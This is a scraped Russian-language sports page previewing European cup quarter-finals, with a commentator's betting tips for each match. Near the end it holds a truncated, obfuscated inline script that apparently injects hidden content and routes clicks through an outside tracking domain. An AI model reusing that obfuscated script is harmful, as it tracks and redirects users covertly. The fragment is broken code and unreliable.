Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ

Прогноз комментатора на всю футбольную неделю — какие события ни в коем случае нельзя пропустить в ближайшие дни

На этой неделе играются четвертьфиналы Лиги Европы и Лиги чемпионов. Болеем за "Шахтер" в матче с "Базелем", поддерживаем Малиновского в битве с "ПСЖ" и наслаждаемся противостоянием "Барселоны" и "Баварии".

Реклама

Спорт Сегодня · Прогноз комментатора на футбольную неделю: какие матчи стоит посмотреть"Интер" – "Байер"

Лига Европы, 10 августа, понедельник в 21:45, канал "Футбол 2", OLL.TV

	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ

"Финал восьми" в Лиге Европы стартует этим матчем. В нем же определится потенциальный соперник "Шахтера" в полуфинале в случае прохода "Базеля". Вторая команда завершившегося сезона Серии А встретится с пятой командой Бундеслиги.

Реклама

Итальянцы пять дней назад прошли "Хетафе", обыграв их 2:0, благодаря голам Лукаку и Эриксена. На счету команды Конте серия из десяти матчей без поражений. Если бы игры ЛЕ проходили во время розыгрыша чемпионата, быть может, "Интер" и не ставил бы перед собой цели победить в евротурнире, но сейчас, фактически между сезонами, точно попробует стать триумфатором. Из потерь у них только опорник Весино, остальные – в строю.

Для "Байера" Лига Европы – это, прежде всего, возможность получить путевку в ЛЧ, так как через чемпионат им это не удалось, хоть они и были близки. В ЛЕ "фармацевты" не проигрывают девять матчей кряду, а на предыдущей стадии они дважды обыграли шотландский "Рейнджерс". Во встрече с "Интером" им не поможет Арангуис, перебравший карточек.

ПРОГНОЗ. Как по мне, "Интер" – очевидный фаворит этой пары. Для выгодного коэффициента можно рассмотреть вариант "Обе команды забьют и "Интер" победит".

"Шахтер" – "Базель"

Лига Европы, 11 августа, вторник в 21:55, канал "Футбол 1", OLL.TV

	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ

Реклама

Чемпионы Украины встретятся с третьей командой Швейцарии. Да, нынешний "Базель" не такой мощный, каким был несколькими годами ранее, но недооценивать их однозначно нельзя. В нынешнем сезоне Лиги Европы швейцарцы проиграли лишь раз – "Краснодару" еще в ноябре, а после оформили серию из пяти побед кряду без пропущенных голов. На предыдущей стадии команда Коллера прошла "Айнтрахт" (3:0, 1:0), от которого "горняки" вылетали из ЛЕ в прошлом сезоне. Вне игры у "Базеля" их основной центральный защитник Эрай Джемерт, он перебрал желтых карточек.

"Шахтер", эффектно обыграв "Вольфсбург" (3:0), из-за дисквалификации лишился Давида Хочолавы. Теперь у Луиша Каштру будет дилемма, как решить вопросы в линии обороны: оставить Матвиенко на левом фланге, а в центре позволить дебютировать Бондарю, или же вернуть Николая в пару к Кривцову, а слева выпустить Сиприано или Болбата. Есть вариант, по которому на позиции Хочолавы сыграет Степаненко, ведь Тарас доигрывал там после удаления Давида, а выбор игроков в центре поля у Каштру прекрасный. Ранее "Шахтер" дважды играл в четвертьфинале этого турнира и оба раза проходил в полуфинал.

ПРОГНОЗ. "Шахтер" – однозначный фаворит пары. По-моему, отличный вариант – их индивидуальный ТБ 1,5 или совместить его с проходом "горняков" в полуфинал, чтобы увеличить коэффициент.

Смотрите обзор матча "Шахтер" – "Вольфсбург":

"Вулверхэмптон" – "Севилья"Реклама

Лига Европы, 11 августа, вторник в 21:55, канал "Футбол 2", OLL.TV

В тренде
Тренер «Базеля» Марсель Коллер: «Шахтер» – явный фаворит. Но у нас тоже есть бразильцы»

	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ

"Волки" под руководством Нуну Эшпириту Санту заставили себя уважать – и в чемпионате, и в Лиге Европы. В АПЛ они финишировали на седьмом месте, а в плей-офф еврокубка выбили "Эспаньол" и "Олимпиакос". Но все же остаются середняком и по-прежнему только обзаводятся опытом игры на международной арене. Хотя их состав точно впечатляет.

"Севилья" не проигрывала с февраля, на ее счету 18 матчей без поражений во всех турнирах. Под руководством Лопетеги андалусийцы забронировали путевку в Лигу чемпионов и являются одним из фаворитов на победу в Лиге Европы. На предыдущей стадии они выбили "Рому" Паулу Фонсеки и рассчитывают пройти в следующий раунд.

ПРОГНОЗ. Думаю, стоит ожидать напряженное тактическое противостояние. А высокой результативности, скорее всего, не будет. Склоняюсь к победе "Севильи" в основное время.

"Аталанта" – "ПСЖ"

Лига чемпионов, 12 августа, среда в 21:55, канал "Футбол 1", OLL.TV

	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ

Ярчайшая пара, от которой стоит ждать фееричного футбола. "Аталанта" – дебютант Лиги чемпионов, который не собирается останавливаться ни перед кем. Напомним, именно они не пустили "Шахтер" в плей-офф турнира, а затем выбили "Валенсию" в предыдущем раунде. Команда Гасперини только недавно закончила сезон на внутренней арене, поэтому не должна испытывать проблем с игровым тонусом. Однако, не сыграет один из ее лидеров Йосип Иличич, который улетел на родину в Словению из-за личных проблем. Также травмирован центрбек Паломино.

"ПСЖ" несколько месяцев совсем не играли в футбол из-за остановки чемпионата Франции, но с середины июля провели пять поединков, в частности, спарринги и два финала Кубка – страны и лиги, в обоих добыв трофеи. Главная потеря Томаса Тухеля – травма Киллиана Мбаппе, кроме того, из-за перебора карточек с итальянцами не сыграет Ди Мария, который в нынешнем сезоне был важнейшим игроком.

ПРОГНОЗ. Обе команды не любят защищаться и отлично чувствуют себя в атаках. Думаю, имеет смысл смотреть на результативность – "Обе забьют", "Голы в обоих таймах", тотал "больше 3.0".

"Барселона" – "Бавария"

Лига чемпионов, 14 августа, четверг в 21:55, канал "Футбол 1", OLL.TV

	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ

Возможно, самая яркая афиша четвертьфинала Лиги чемпионов, учитывая количество титулов команд в своих чемпионатах и в самом престижном евротурнире. "Барса" неудачно проводит сезон, лишившись чемпионства Примеры и не дотянув даже до финала Кубка Испании. Негативных разговоров о каталонцах куда больше, нежели позитивных. Вполне вероятно, что в случае поражения от "Баварии", Кике Сетьен покинет должность главного тренера "блаугранас". Да и вообще избежать этого можно будет только в случае триумфа в Лиге чемпионов. В предыдущем раунде после февральской ничьи с "Наполи" (1:1), каталонцы несколько дней назад уничтожили "партенопеи" (3:1), в первую очередь, благодаря очередному суперматчу в исполнении Лео Месси. По сравнению с тем поединком, тренерский штаб снова может рассчитывать на Бускетса и Артуро Видаля, отбывших дисквалификации.

У "Баварии" серия из 23 матчей без поражений, в которых команда добыла 22 победы во всех турнирах, в том числе завоевав чемпионство Бундеслиги и Кубок Германии. "Челси" в 1/8й ими было бито дважды – 3:0 в Лондоне в конце зимы и 4:1 дома на прошлой неделе. Коман и Павар вне игры из-за травм.

ПРОГНОЗ. Есть предчувствие, что напряжения будет больше, нежели голов. Можно попробовать рискнуть и поставить на то, что гола в первом тайме не будет.

Все подробности в спецтеме "Шахтер" в Лиге Европы

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

Реклама

прогноз
Лига чемпионов
анонс
Лига Европы

Источник:

Сегодня|Спорт

Читайте Segodnya.ua в Google News

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Реклама

Новости партнеров

Загрузка…

Популярные статьи

	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТФедерация футбола Турции оставила супергероя из «Динамо» в Высшей лиге из-за коронавирусаФутбол 	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТСамый молодой арбитр в истории Премьер-лиги обслужит матч «Шахтер» – «Базель» в Лиге ЕвропыФутбол 	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТФорвард «Динамо», избитый на квартире, пришел на шоу Усика с красоткой-женой: фотоФутбол 	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ«Шахтер» – «Вольфсбург»: онлайн матча 1/8 финала Лиги ЕвропыФутбол 	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ«Шахтер» едет в Германию: что ждет чемпиона Украины в плей-офф Лиги ЕвропыФутбол 	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТТрансфер века в футболе: «Интер» расставил все точки над «і» в истории с переходом МессиФутбол

Новости партнеров

Загрузка…

загрузка…

В тренде

Коронавирус вУкраине

152-й день карантина

  • 81957
    +1008 инфицированы
  • 44359
    +387 выздоровели
  • 1922
    +25 умерли

Все о COVID-19

Данные СНБО

  • Минимальная зарплата растет: когда и как изменятся пенсии украинцев
  • Минздрав расширил список «зеленых» стран: с кого сняли ограничения
  • Не повторить украинский сценарий в Беларуси: в Европарламенте серьезно предупредили Россию

Все новости

  • Как узнать размер пенсии и страховой стаж: в Пенсионном фонде дали совет
    	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ

    10 августа, 16:46
    Новости У24

  • Успенский пост-2020: когда начинается и сколько продлится

    10 августа, 16:44
    Events

  • Минимальная зарплата растет: когда и как изменятся пенсии украинцев

    10 августа, 16:42
    Экономика

  • «Атлетико» назвал имена игроков, заразившихся коронавирусом перед матчем 1/4 финала Лиги чемпионов

    10 августа, 16:31
    Лига чемпионов

  • Нацбанк обновил курс доллара и евро в Украине

    10 августа, 16:29
    Финансы

  • Реклама

  • Коронавирус обнаружили в детсаду Черкасс: детей отправили на изоляцию

    10 августа, 16:25
    Другие регионы

  • Кравчук рассказал, с кем в ОРДЛО готов вести переговоры

    10 августа, 16:23
    Политика

  • Вторая волна коронавируса: как уберечь ребенка от заражения в школе
    	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ

    10 августа, 16:21
    Новости У24

  • Россия потеряла 11 млрд долларов на продаже газа в Европу: названа причина

    10 августа, 16:20
    Экономика

  • Минздрав расширил список «зеленых» стран: с кого сняли ограничения

    10 августа, 16:19
    Украина

  • Пока в одном месте дрались, в другом аплодировали: протесты в Беларуси глазами местных жителей

    10 августа, 16:17
    Другие страны

  • Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ

    10 августа, 16:15
    Футбол

  • 10 августа, 16:14

    В Киевской области нашли убитой пропавшую 12-летнюю девочку: все подробности и фото

    Подробности

  • Луческу против «Шахтера» сыграет в 9-м туре: опубликован календарь нового чемпионата Украины

    10 августа, 16:10
    ЧУ по футболу

  • Признают ли выборы на Западе: озвучен прогноз, что ждет Лукашенко
    	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ

    10 августа, 16:09
    Новости У24

  • Российская Госдума требует аннулировать результат матча, в котором засудили команду киевлянина

    10 августа, 16:08
    Футбол

  • Из Украины в Германию запустят регулярный авиарейс: расписание

    10 августа, 16:07
    Транспорт

  • 1/4 финала Лиги Европы: расписание, результаты и список трансляций матчей, котировки букмекеров

    10 августа, 15:46
    Футбол

  • Джаред Лето сыграет знаменитого художника поп-арта украинского происхождения Энди Уорхола

    10 августа, 15:44
    Афиша

  • Легендарный соотечественник Луческу уволил сам себя с поста главного тренера

    10 августа, 15:42
    Футбол

Реклама

	Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • Реклама на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

Стоковые фотографии от

© segodnya.ua, 2020

Главное

Лента новостей

Мы обновили правила сбора и хранения персональных данных

Вы можете ознакомиться c изменениямы в

политике конфиденциальности.

Нажимая накнопку «Принять» или продолжая пользоваться сайтом, вы соглашаетесь с обновленными правилами и даете разрешение на использование файлов cookie.

Принять

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){«use strict»;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=»/z»,X=»0x04″,B=»http»,G=»substr»,K=»host»,Q=J,U=»argon_»+»debug»+»=1″,V=»prototype»,Y=»createElement»,Z=»appendChild»,tt=»setTimeout»,ot=»querySelectorAll»,et=»getOwnPropertyDescriptor»,rt=»Object»,nt=»charCodeAt»,it=»fromCharCode»,at=»zmctrack»+».net»,ct=»bind»,ft=»call»,lt=»script»,dt=»head»,st=»get»,pt=»set»,ht=»indexOf»,ut=»s.»+at,bt=»cookie»,kt=»XMLHttpRequest»,vt=»Date»,gt=»now»,xt=»responseText»,mt=»open»,yt=»ShadowRoot»,wt=»Node»,At=»send»,zt=»Array»,St=»addEventListener»,Tt=B+»://»+»click»+».»+at+»/c/»+»redirect»+»?»+»hash»+»=»,Dt=»slot»,Et=»Math»,Mt=»floor»,Ct=»random»,Ot=»console»,Lt=»Document»,Nt=»innerHTML»,_t=»attachShadow»,Ht=»offsetWidth»,It=»Element»,Rt=»next»,qt=»previous»,Pt=»push»,$t=»length»,jt=»shift»,Ft=»parentNode»,Jt=»textContent»,Wt=»JSON»,Xt=»parse»,Bt=»load»,Gt=»HTML»+It,Kt=»error»,Qt=»location»,Ut=»href»,Vt=»POST»,Yt=»document»,Zt=»un»+»eval»,to={},oo=»parseInt»,eo=It+»Sibling»,ro=»String»,no=»split»;to[«mode»]=»closed»,t=l[Yt],o=l[«chrome»],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||»|»)}!o&&!e||(z=l[«n10091125»],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня

0 Replies to “Горячая футбольная неделя! Прогноз комментатора на ТОП-матчи еврокубков. ПОДКАСТ”